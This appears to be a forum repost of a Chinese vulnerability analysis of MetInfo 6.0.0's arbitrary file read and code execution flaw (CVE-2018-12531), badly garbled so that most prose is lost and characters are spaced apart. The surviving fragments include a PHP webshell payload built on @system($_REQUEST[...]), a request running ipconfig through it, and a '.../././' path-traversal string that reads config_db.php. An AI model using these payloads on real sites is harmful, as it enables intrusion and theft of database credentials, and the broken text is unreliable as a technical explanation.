[2052] 2021-01-26_MetInfo6.0.0任意文件读取代码执行漏洞分析

文档创建者:s7ckTeam
浏览次数:5
最后更新:2025-01-16
2021-01-26_MetInfo6.0.0任意文件读取代码执行漏洞分析 M e t I n f o   6 . 0 . 0   /   d o n 9   d o n 9 s e c   2 0 2 1 - 0 1 - 2 6   #   , 1 9 0 x 0 1                   M e t I n f o 使 P H P M y s q l M e t I n f o   6 . 0 . 0                 ( C V E - 2 0 1 8 - 1 2 5 3 1 ) w e b s h e l l                 o l d _ t h u m b . c l a s s . p h p 0 x 0 2   p h p s t u d y   p r o p h p   5 . 3 . 2 9 M e t I n f o   6 . 0 . 0 p a y l o a d h t t p : / / w w w . m e t i n f o . c n / u p l o a d / f i l e / M e t I n f o 6 . 0 . 0 . z i p * / @ s y s t e m ( $ _ R E Q U E S T [ d o n 9 s e c ] ) ; / *
p a y l o a d i p c o n f i g i p c o n g c a t   c o n f i g c o n f i g _ d b . p h p #   / c o n f i g / c o n f i g _ d b . p h p ? d o n 9 s e c = / c o n f i g / c o n f i g _ d b . p h p ? d o n 9 s e c = i p c o n f i g
p h p s t u d y   p r o p h p   5 . 3 . 2 9 c o n f i g _ d b . p h p : ? d i r = . . . / . / h t t p / . . . / . / c o n f i g / c o n f i g _ d b . p h p
( ) 0 x 0 3   p a y l o a d : p a y l o a d / * p a y l o a d : * / @ s y s t e m ( $ _ R E Q U E S T [ d o n 9 s e c ] ) ; / * * / / * * /
o l d _ t h u m b . c l a s s . p h p $ d i r $ d i r i n c l u d e / t h u m b . p h p #   $ d i r C t r l   +   S h i f t   +   F
$ d i r G E T . . / b y p a s s r e a d f i l e i f s t r s t r ( )   : $ d i r h t t p $ d i r h t t p p a y l o a d o l d _ t h u m b . c l a s s . p h p #   使 . . / 穿 使 . . . / . /   . . . / . /   -   . . /   =   . . /   #   #   x ? d i r = . . . / . / h t t p / . . . / . / x x x #   o l d _ t h u m b C t r l   +   S h i f t   +   F
i n c l u d e / t h u m b . p h p o l d _ t h u m b . c l a s s . p h p b y p a s s $ d i r p a y l o a d ? d i r = . . . / . / h t t p / . . . / . / c o n f i g / c o n f i g _ d b . p h p h t t p s : / / c a i q i q i . g i t h u b . i o /
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则